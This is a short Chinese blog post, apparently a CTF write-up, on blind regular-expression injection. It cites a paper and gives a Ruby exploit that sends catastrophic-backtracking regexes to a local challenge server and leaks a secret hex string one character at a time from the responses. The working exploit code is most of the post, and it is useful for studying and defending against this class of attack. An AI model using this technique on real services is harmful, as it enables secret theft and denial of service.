Posted Updated a minute read (About 149 words)

正则匹配时间盲注

正则匹配时间盲注

论文:https://diary.shift-js.info/blind-regular-expression-injection/
2021ciscn 正则表达式盲注exp

require 'net/http'

CHALLENGE = 'http://127.0.0.1:4567/'

String.class_eval do
  def hex
    res = ''
    self.each_byte do |i|
      res += "%02x" % i
    end
    return res
  end
end

def random(len)
  chars = ("a".."z").to_a + ("A".."Z").to_a + ("0".."9").to_a
  s = ""
  1.upto(len) do
    s << chars[rand(chars.size - 1)]
  end
  s
end

def check_result(reg, suffix)
  full_regexp = "^(?=" + reg + ")((.*)*)*" + suffix
  p full_regexp
  uri = URI(CHALLENGE + 'check/' + full_regexp.hex)
  Net::HTTP.get_response(uri)
end

def leak(flag, r)
  chars = '0123456789abcdef'
  (0..15).each do |i|
    if check_result(flag + chars[i], r).body["False"]
      p flag + chars[i]
      return leak(flag + chars[i], r)
    end
  end
end

r = random(10)+'$'
leak('', r)


# "facdf9972bb5fdf9c35d6e09770e9af7"

正则匹配时间盲注

http://example.com/2021/08/26/正则匹配时间盲注/

Author

vague huang

Posted on

2021-08-26

Updated on

2021-08-26

Licensed under

Like this article? Support the author with

Comments

Follow

Links

Recents

Archives

Tags

CSRF1
MYSQL1
PHP5
XSS1
bugku3
bugku21
hexo1
html1
html原理1
php2
sqlmap1
sql注入9
typro1
xss1
反弹shell2
文件上传1
文件包含1
渗透测试1

Subscribe for updates

You need to set client_id and slot_id to show this AD unit. Please set it in _config.yml.

follow.it

×